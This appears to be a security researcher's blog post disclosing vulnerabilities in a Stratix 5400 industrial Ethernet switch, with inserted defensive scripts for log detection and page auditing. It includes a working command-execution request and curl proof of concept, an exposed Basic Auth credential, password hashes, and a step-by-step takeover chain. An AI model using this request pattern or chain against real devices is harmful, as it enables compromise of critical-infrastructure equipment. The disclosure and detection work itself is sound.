Executive Summary
While playing around with a Rockwell Stratix 5400 industrial Ethernet switch, I uncovered a series of vulnerabilities that, when chained together, allow complete device compromise with minimal effort.
Key Findings
| Vulnerability | Impact | Exploitability |
|---|---|---|
| GET-Based RCE (No CSRF) | Full command execution | Trivial - single HTTP GET |
| CSRF to RCE | Unauthenticated → RCE via CSRF | Easy - malicious webpage |
| Password Hash Exposure | Complete credential disclosure | Trivial - view HTML source |
| Privilege Escalation Chain | Read-only → Admin escalation | Easy - hash cracking |
Cisco Stratix 5400 Industrial Ethernet Switch - commonly deployed in critical infrastructure
Background: The Cisco Stratix 5400
The Cisco Stratix 5400 is an industrial-grade Ethernet switch designed for harsh environments including manufacturing facilities, utilities, oil & gas operations, and transportation systems.
Target Device Specifications:
- Model: 1783-BMS10CGP
Critical Finding #1: GET-Based Remote Code Execution (No CSRF Protection)
The Vulnerability
The web interface exposes a GET-based command execution endpoint that accepts arbitrary CLI commands without CSRF token protection:
Endpoint: /%24{variable}%0A?{variable}=<command>
Method: GET
Authentication: Required (HTTP Basic Auth)
CSRF Protection: NONE
Technical Details
The endpoint uses URL-encoded variable substitution:
- %24 = $ (dollar sign)
- %0A = \n (newline)
- Any variable name works: a, b, c, d, cmd, command, etc.
Working pattern discovered:
GET /%24b%0A?b=show%20running-config HTTP/1.1
Host: 192.168.103.143
Authorization: Basic YWRtaW46U3RlcGhlbjEz
Response: 200 OK
Content-Length: 4700
[Full device configuration with passwords]
Proof of Concept
curl -k -u admin:password \
"https://192.168.103.143/%24b%0A?b=show%20version%20|%20include%20uptime"
# Returns:
stratix uptime is 11 hours, 42 minutes
Confirmed Working Commands
| Command | Output Size | Sensitive Data |
|---|---|---|
| show running-config | 4,700 bytes | Passwords, SNMP strings, network config |
| show startup-config | 3,354 bytes | Saved configuration |
| show version | 2,921 bytes | IOS version, serial numbers |
| show users | 142 bytes | Active sessions |
| show ip interface brief | 820 bytes | Network topology |
| dir flash: | 1,113 bytes | File system contents |
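For defenders, the most useful thing about the pattern above is that it is easy to spot in web-server or proxy access logs: the request path decodes to `$<name>` followed by a newline, and the query string carries the command under that same name. The script below is an added example (not part of the original post and not Rockwell or Cisco code) that decodes that pattern from combined-format access-log lines and reports the source, user, status and the command that was requested. The log lines are constructed samples, and the log format is an assumption; the switch's own log format may differ.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not taken from a real device.
SAMPLE_LOG = """\
10.0.0.5 - admin [12/Mar/2025:10:01:02 +0000] "GET /%24b%0A?b=show%20running-config HTTP/1.1" 200 4700
10.0.0.5 - admin [12/Mar/2025:10:01:09 +0000] "GET /useraccounts.shtml HTTP/1.1" 200 1811
10.0.0.9 - - [12/Mar/2025:10:02:30 +0000] "GET /%24cmd%0A?cmd=show%20version%20|%20include%20uptime HTTP/1.1" 200 61
10.0.0.7 - admin [12/Mar/2025:10:03:00 +0000] "GET /index.shtml HTTP/1.1" 200 5120
"""

# Combined-log-format line: source, ident, user, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) (?P<bytes>\d+)'
)
# A request path that decodes to "$<name>\n" is the variable-substitution pattern.
SUBST_RE = re.compile(r'^\$(\w+)\n?$')


def decode_command(target):
    """Return (variable, command) if the request target uses the substitution
    pattern, otherwise None. Works on the raw, still URL-encoded target."""
    parts = urlsplit(target)
    path = unquote(parts.path.lstrip('/'))   # "%24b%0A" -> "$b\n"
    m = SUBST_RE.match(path)
    if not m:
        return None
    var = m.group(1)
    qs = parse_qs(parts.query, keep_blank_values=True)  # parse_qs already URL-decodes values
    cmd = qs.get(var, [''])[0]
    return var, cmd


def scan_log(text):
    """Scan access-log text and return one finding per GET request that
    matches the command-execution pattern (other requests are ignored)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group('method') != 'GET':
            continue
        hit = decode_command(m.group('target'))
        if hit is None:
            continue
        var, cmd = hit
        findings.append({
            'src': m.group('src'),
            'user': m.group('user'),
            'status': int(m.group('status')),
            'bytes': int(m.group('bytes')),
            'variable': var,
            'command': cmd,
        })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']} user={f['user']} status={f['status']} bytes={f['bytes']} "
              f"${f['variable']} -> {f['command']!r}")
```

A 200 response with a large byte count on one of these requests (the 4,700-byte `show running-config` reply in the sample) is the signature of a configuration being pulled out; a hit from a source address that is not an administrator workstation, or with no logged user, is worth an immediate look because it is consistent with the CSRF variant described in the next finding.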
Critical Finding #2: CSRF Leading to Unauthenticated RCE
Because the RCE endpoint uses GET requests with no CSRF token, any webpage can trigger command execution when visited by an authenticated administrator.
Attack Scenario
- Attacker creates malicious webpage
- Sends link to network administrator
- Admin clicks link while logged into switch web interface
- Malicious JavaScript executes commands in admin's browser context
- Full device configuration exfiltrated to attacker's server
Critical Finding #3: Password Hash Exposure
The useraccounts.shtml page includes a hidden textarea that contains the output of SSI commands, exposing all user account password hashes in the HTML source code.
Vulnerable Code
<textarea style="display:none; visibility:hidden;" id="USER_SUMMARY">
<!--#exec cmd='more system:running-config | i user'-->
</textarea>
When rendered:
username admin privilege 15 secret 5 $1$P4Bi$8t74cAAknpCiVCvL7IC6T.
username vulntest privilege 5 secret 9 $9$wLzi8Cmi6aH91k$qOAH1kOzmLhTX1tKqGx/...
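To check whether a device's web interface is leaking account lines in a hidden element, and how much damage each leaked line represents, it helps to parse the page rather than eyeball it: a `secret 5` entry is MD5-crypt and crackable offline (as the attack chain below relies on), while `secret 8` and `secret 9` are PBKDF2-SHA256 and scrypt respectively and far costlier to attack. The audit script below is an added example (not from the original post and not vendor code) that extracts the text of hidden `<textarea>` elements from saved HTML and classifies each `username ... secret <type>` line. The HTML and the hash values in it are constructed placeholders, not real credentials.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a saved page, with placeholder hash values (not real credentials).
SAMPLE_HTML = """\
<html><body>
<h1>User Accounts</h1>
<textarea style="display:none; visibility:hidden;" id="USER_SUMMARY">
username admin privilege 15 secret 5 $1$EXAMPLE$placeholderhashvalue000000
username vulntest privilege 5 secret 9 $9$EXAMPLEsalt$placeholderhashvalue0000000000
</textarea>
<p>Visible content</p>
</body></html>
"""

# One line per configured user: "username <name> [privilege <n>] secret <type> <value>"
USER_RE = re.compile(r'^username (\S+) (?:privilege (\d+) )?secret (\d+) (\S+)', re.M)

# Cisco IOS secret types and how exposing them should be rated.
HASH_TYPES = {
    '5': ('MD5-crypt', 'high: fast hash, offline cracking is practical'),
    '8': ('PBKDF2-SHA256', 'medium: slow hash, still rotate the password'),
    '9': ('scrypt', 'medium: slow hash, still rotate the password'),
}


class HiddenTextareaParser(HTMLParser):
    """Collect the text of every <textarea> that is hidden via inline style."""

    def __init__(self):
        super().__init__()
        self.blocks = []        # list of (element id, text)
        self._in_hidden = False
        self._id = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != 'textarea':
            return
        a = dict(attrs)
        style = (a.get('style') or '').replace(' ', '').lower()
        if 'display:none' in style or 'visibility:hidden' in style:
            self._in_hidden = True
            self._id = a.get('id')
            self._buf = []

    def handle_endtag(self, tag):
        if tag == 'textarea' and self._in_hidden:
            self.blocks.append((self._id, ''.join(self._buf)))
            self._in_hidden = False

    def handle_data(self, data):
        if self._in_hidden:
            self._buf.append(data)


def audit_page(html):
    """Return one finding per account line found inside a hidden textarea,
    rating the exposure by the secret type used."""
    parser = HiddenTextareaParser()
    parser.feed(html)
    parser.close()
    findings = []
    for elem_id, text in parser.blocks:
        for user, priv, htype, _value in USER_RE.findall(text):
            algo, risk = HASH_TYPES.get(htype, ('unknown type ' + htype, 'review manually'))
            findings.append({
                'element': elem_id,
                'user': user,
                'privilege': int(priv) if priv else 1,   # IOS default privilege level is 1
                'type': htype,
                'algorithm': algo,
                'risk': risk,
            })
    return findings


if __name__ == '__main__':
    for f in audit_page(SAMPLE_HTML):
        print(f"{f['element']}: {f['user']} (priv {f['privilege']}) secret {f['type']} "
              f"{f['algorithm']} -> {f['risk']}")
```

Run it against HTML saved from your own device's `useraccounts.shtml`; any finding means the SSI output is reaching the browser and every listed account should be treated as exposed, with the privilege-15 type-5 entries rotated first.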
The Complete Attack Chain
Phase 1: Initial Access
Attacker obtains read-only credentials (default/weak passwords)
Phase 2: Information Disclosure
Access useraccounts.shtml → extract admin password hash from HTML source
Phase 3: Offline Password Cracking
Run hashcat on MD5-crypt hash → cracked in ~15 minutes with GPU
Phase 4: Admin Access
Login with cracked admin credentials → full web interface access
Phase 5: Remote Code Execution
Use GET-based RCE endpoint → extract all configuration, passwords, network topology
COMPLETE DEVICE COMPROMISE
Disclaimer: This assessment was performed on authorized equipment for security research purposes. All findings are reported in good faith to improve security.
This post is part of my ongoing ICS security research. For more projects and research, visit the ICS Projects page.